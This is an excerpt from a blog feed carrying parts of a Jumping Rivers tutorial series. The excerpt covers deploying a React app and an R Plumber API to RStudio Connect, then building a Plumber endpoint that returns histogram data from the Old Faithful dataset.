&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; appName &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Static Faithful API&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; server &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;myserver&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rsconnect&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;deployApp&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; appDir &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;path/to/app/directory&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; appName &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Static Faithful App&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; server &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;myserver&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The output of each call will include a link to your deployed content. From there you can set the content URL.&lt;/p&gt;
&lt;h3 id="content-url"&gt;Content URL&lt;/h3&gt;
&lt;p&gt;The final step to avoid CORS problems is to set the content URL for both the app and the API. This can be done by clicking the settings symbol, then opening the Access tab. There will be a Content URL entry at the bottom of the sidebar.&lt;/p&gt;
&lt;p&gt;We want to set these to be the same as the URLs we chose for the environment variables in &lt;code&gt;.env.production&lt;/code&gt;. If you&amp;rsquo;ve been following the tutorial, these would be as follows:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;https://{YOUR_CONNECT_SERVER_HERE}/stf/api/
https://{YOUR_CONNECT_SERVER_HERE}/stf/react/
&lt;/code&gt;&lt;/pre&gt;&lt;h3 id="final-words"&gt;Final Words&lt;/h3&gt;
&lt;p&gt;You should be finished if everything is operating as planned, which means you&amp;rsquo;ll have your app deployed on RStudio Connect. If you&amp;rsquo;ve made it this far, congratulations! It was a lengthy tutorial!&lt;/p&gt;
&lt;p&gt;Thanks for following along, we hope you&amp;rsquo;ve found it helpful and that you&amp;rsquo;re now intrigued by the possibility of React apps on RStudio Connect.&lt;/p&gt;
&lt;p&gt;If you have any questions or feedback, please let us know.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/r-shiny-plumber-react-part-3/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Recreating the Shiny App tutorial with a Plumber API + React: Part 2</title><link>https://www.jumpingrivers.com/blog/r-shiny-plumber-react-node-npm-part-2/</link><pubDate>Thu, 14 Jul 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/r-shiny-plumber-react-node-npm-part-2/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/r-shiny-plumber-react-node-npm-part-2/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/r-shiny-plumber-react-node-npm-part-2/featured.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is part two of our three part series&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Part 1: &lt;a href="https://www.jumpingrivers.com/blog/r-shiny-plumber-react-part-1" rel="external"&gt;Recreating the Shiny App tutorial with a Plumber API + React: Part 1&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Part 2: Recreating the Shiny App tutorial with a Plumber API + React: Part 2 (this post)&lt;/li&gt;
&lt;li&gt;Part 3: &lt;a href="https://www.jumpingrivers.com/blog/r-shiny-plumber-react-part-3" rel="external"&gt;Recreating the Shiny App tutorial with a Plumber API + React: Part 3&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In the first part of this series, we introduced the technologies and packages required to create an application using ReactJS and an R {plumber} API instead of {shiny}. In this post, we will take you through the tutorial itself.&lt;/p&gt;
&lt;h3 id="dependencies"&gt;Dependencies&lt;/h3&gt;
&lt;p&gt;Before we start we need to ensure we have the tools that this exercise depends on:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://nodejs.org/en/" rel="external"&gt;Node &amp;gt;= 10.16 and npm &amp;gt;= 5.6&lt;/a&gt; - Node is a JavaScript runtime environment that allows us to run JavaScript outside of a Web browser, npm is software registry that runs on Node.js that we can use to download open source packages.&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.r-project.org/" rel="external"&gt;R&lt;/a&gt; - If you&amp;rsquo;re on this blog you&amp;rsquo;re probably familiar with R&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.rplumber.io/" rel="external"&gt;R Plumber&lt;/a&gt; - The web API R Package&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.rstudio.com/products/connect/" rel="external"&gt;RStudio Connect&lt;/a&gt; - The publishing platform we want to host our content on&lt;/li&gt;
&lt;li&gt;&lt;a href="https://rstudio.github.io/rsconnect/" rel="external"&gt;rsconnect R package&lt;/a&gt; - An R package used for deploying applications to RStudio Connect.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;For the IDE I am using Visual Studio Code (VSCode), although which IDE you use is up to you. VSCode is a popular code editor that offers many features to help developers be more productive. It has a wide range of extensions that can add even more functionality, such as support for various languages and tools to help with version control. I think it is a great choice of IDE for this tutorial as we&amp;rsquo;re making use of multiple languages.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-r-shiny-plumber-react-node-npm-part-2"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="lets-make-the-app"&gt;Let&amp;rsquo;s make the App&lt;/h2&gt;
&lt;p&gt;We&amp;rsquo;ll assume you have a basic understanding of HTML and JavaScript, but you should be able to follow along with a basic programming background. Having a little knowledge of Linux shell commands would be beneficial for some of the terminal commands for generating directories, but you can also do most of it in VSCode using the user interface instead.&lt;/p&gt;
&lt;p&gt;Let&amp;rsquo;s attempt an exercise in creating a small React+Plumber app; this will be very similar to a previous &lt;a href="https://www.jumpingrivers.com/blog/r-shiny-python-flask/" rel="external"&gt;blog post&lt;/a&gt; recreating &lt;a href="https://shiny.rstudio.com/tutorial/written-tutorial/lesson1/" rel="external"&gt;this tutorial {shiny} application&lt;/a&gt; using Python Flask.&lt;/p&gt;
&lt;img class="image-center" src="HelloReact.png" alt="Screenshot of histogram of waiting times with bins slider." style="width:650px; class:image-center"&gt;
&lt;p&gt;This will consist of two independent parts:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The R Plumber API that will serve the data&lt;/li&gt;
&lt;li&gt;The React UI that will consume the data from the API&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="folder-structure"&gt;Folder Structure&lt;/h3&gt;
&lt;p&gt;Let&amp;rsquo;s start by creating a directory containing the project and then also a directory to house the API we will create.
The command below is for bash, but use whichever method is easiest for you to create directories.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;mkdir -p app_example/api
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;After this command the folder structure should look like this:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;.
└── app_example
    └── api
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;We would like our folder structure to eventually look like this:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;.
└── app_example
    ├── api
    └── example-app
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;But we will create the app directory later using a React command line tool.&lt;/p&gt;
&lt;h3 id="plumberr-api"&gt;Plumber.R (API)&lt;/h3&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;.
└── app_example
    └── api
        └── plumber.R
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Here is the code for the plumber.R file for our React app. It will contain a single endpoint whose sole purpose is to return some histogram data that can be consumed by the React application.&lt;/p&gt;
&lt;p&gt;We can create a new file under the API directory and add the following.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# plumber.R&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#*@apiTitle Example Plumber API&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#* Get Histogram raw data&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#* @get /hist-raw&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(bins) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; faithful&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;waiting
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; bins &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;as.numeric&lt;/span&gt;(bins)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; breaks &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;seq&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;min&lt;/span&gt;(x), &lt;span style="color:#d2a8ff;font-weight:bold"&gt;max&lt;/span&gt;(x), length.out &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; bins &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; hist_out &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;hist&lt;/span&gt;(x, breaks &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; breaks, main &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Raw Histogram&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;as.data.frame&lt;/span&gt;(hist_out[2&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt;])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Note that at the top we have set the title of our API with the &amp;ldquo;&lt;code&gt;#*@apiTitle&lt;/code&gt;&amp;rdquo; annotation, naming it &amp;ldquo;Example Plumber API&amp;rdquo;.&lt;/p&gt;
&lt;p&gt;This uses the &amp;ldquo;Old Faithful Geyser Data&amp;rdquo; dataset which is natively available within R. We then pass this data into a histogram function along with a user specified number of bins parameter, and transform this into a dataframe of raw information that describes a histogram that looks something like the following:&lt;/p&gt;
&lt;h3 id="histogram-function-output"&gt;Histogram Function Output&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-R" data-lang="R"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; counts density mids xname equidist
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;44&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0.01526082&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;48.3&lt;/span&gt; x &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;50&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0.01734184&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;58.9&lt;/span&gt; x &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;32&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0.01109878&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;69.5&lt;/span&gt; x &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;117&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0.04057991&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;80.1&lt;/span&gt; x &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;29&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0.01005827&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;90.7&lt;/span&gt; x &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="runplumberr-api"&gt;runPlumber.R (API)&lt;/h3&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;.
└── app_example
    └── api
        ├── runPlumber.R
        └── plumber.R
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Our runPlumber.R file is dependent on the plumber.R file above:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;plumber&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;pr&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;plumber.R&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;pr_run&lt;/span&gt;(port &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;8000&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Here is our second R file. It passes our previous plumber.R file into a {plumber} router function and runs it on a port of our choice. In this example we have gone with port 8000.&lt;/p&gt;
&lt;p&gt;We can check if the {plumber} API works by running our runPlumber.R with Rscript from a terminal:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Rscript runPlumber.R
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If you&amp;rsquo;re attempting this on Windows, you may need to specify the full path to the Rscript executable in the R directory in Program Files, which might look something like the following:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;C:\Program Files\R\(R Version)\bin\x64\RScript.exe&amp;#34;&lt;/span&gt; runPlumber.R
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This should get the following output:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Running plumber API at http://127.0.0.1:8000
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Running swagger Docs at http://127.0.0.1:8000/__docs__/
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;{plumber} generates documentation for our API using Swagger. We can view it by opening the docs address given above in a browser:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;http://127.0.0.1:8000/__docs__/
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We can select the endpoint we want to check, click &amp;ldquo;Try it out&amp;rdquo;, then enter a number of bins and execute.&lt;/p&gt;
&lt;img class="image-center" src="APIBrowser2.png" alt="Screenshot of input screen requesting number of bins" style="width:650px; class:image-center"&gt;
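&lt;p&gt;For reference, the request made from the documentation page can also be written out as a plain URL. The sketch below builds that URL in JavaScript. It assumes the endpoint is the hist-raw route with a bins query parameter, as used in the App.js code later in this post; the helper name histUrl is our own and purely illustrative.&lt;/p&gt;

```javascript
// Build the request URL for a given number of bins.
// Assumption: the API from this post is listening on port 8000 and exposes
// a GET endpoint at /hist-raw that reads a `bins` query parameter.
function histUrl(bins, base = "http://127.0.0.1:8000") {
  const url = new URL("/hist-raw", base);
  url.searchParams.set("bins", String(bins));
  return url.toString();
}

console.log(histUrl(5)); // http://127.0.0.1:8000/hist-raw?bins=5
```

&lt;p&gt;Pasting the printed address into a browser while the API is running is another quick way to check the endpoint.&lt;/p&gt;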
&lt;p&gt;If we enter 5 as the number of bins, we should get a response similar to the output below.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-json" data-lang="json"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#7ee787"&gt;&amp;#34;counts&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;44&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#7ee787"&gt;&amp;#34;density&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;0.0153&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#7ee787"&gt;&amp;#34;mids&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;48.3&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#7ee787"&gt;&amp;#34;xname&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#34;x&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#7ee787"&gt;&amp;#34;equidist&amp;#34;&lt;/span&gt;: &lt;span style="color:#79c0ff"&gt;true&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; },
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#7ee787"&gt;&amp;#34;counts&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;50&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#7ee787"&gt;&amp;#34;density&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;0.0173&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#7ee787"&gt;&amp;#34;mids&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;58.9&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#7ee787"&gt;&amp;#34;xname&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#34;x&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#7ee787"&gt;&amp;#34;equidist&amp;#34;&lt;/span&gt;: &lt;span style="color:#79c0ff"&gt;true&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; },
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#7ee787"&gt;&amp;#34;counts&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;32&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#7ee787"&gt;&amp;#34;density&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;0.0111&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#7ee787"&gt;&amp;#34;mids&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;69.5&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#7ee787"&gt;&amp;#34;xname&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#34;x&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#7ee787"&gt;&amp;#34;equidist&amp;#34;&lt;/span&gt;: &lt;span style="color:#79c0ff"&gt;true&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; },
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#7ee787"&gt;&amp;#34;counts&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;117&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#7ee787"&gt;&amp;#34;density&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;0.0406&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#7ee787"&gt;&amp;#34;mids&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;80.1&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#7ee787"&gt;&amp;#34;xname&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#34;x&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#7ee787"&gt;&amp;#34;equidist&amp;#34;&lt;/span&gt;: &lt;span style="color:#79c0ff"&gt;true&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; },
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#7ee787"&gt;&amp;#34;counts&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;29&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#7ee787"&gt;&amp;#34;density&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;0.0101&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#7ee787"&gt;&amp;#34;mids&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;90.7&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#7ee787"&gt;&amp;#34;xname&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#34;x&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#7ee787"&gt;&amp;#34;equidist&amp;#34;&lt;/span&gt;: &lt;span style="color:#79c0ff"&gt;true&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If this works for you, the {plumber} API example is complete for now. We just need to make the React application that consumes this API data.&lt;/p&gt;
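&lt;p&gt;As a rough preview of what consuming this data involves, the sketch below reshapes a response of this form into the separate x and y arrays that a bar chart typically needs. The helper name toBarTrace is hypothetical, and the sample rows are just the first two bins copied from the output above.&lt;/p&gt;

```javascript
// Sample rows copied from the response shown above (first two bins only).
const rows = [
  { counts: 44, density: 0.0153, mids: 48.3, xname: "x", equidist: true },
  { counts: 50, density: 0.0173, mids: 58.9, xname: "x", equidist: true },
];

// Hypothetical helper: reshape the row-wise response into one bar trace,
// with bin midpoints on the x axis and counts on the y axis.
function toBarTrace(histogramRows) {
  return {
    x: histogramRows.map((row) => row.mids),
    y: histogramRows.map((row) => row.counts),
    type: "bar",
  };
}

const trace = toBarTrace(rows);
console.log(trace);
```

&lt;p&gt;Keeping this reshaping in one small function makes it easy to check on its own, before any user interface is involved.&lt;/p&gt;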
&lt;h2 id="react-application"&gt;React Application&lt;/h2&gt;
&lt;p&gt;We want to change directory to the parent app_example directory and create a React application here.
Using create-react-app is a quick way to scaffold a single-page React application:&lt;/p&gt;
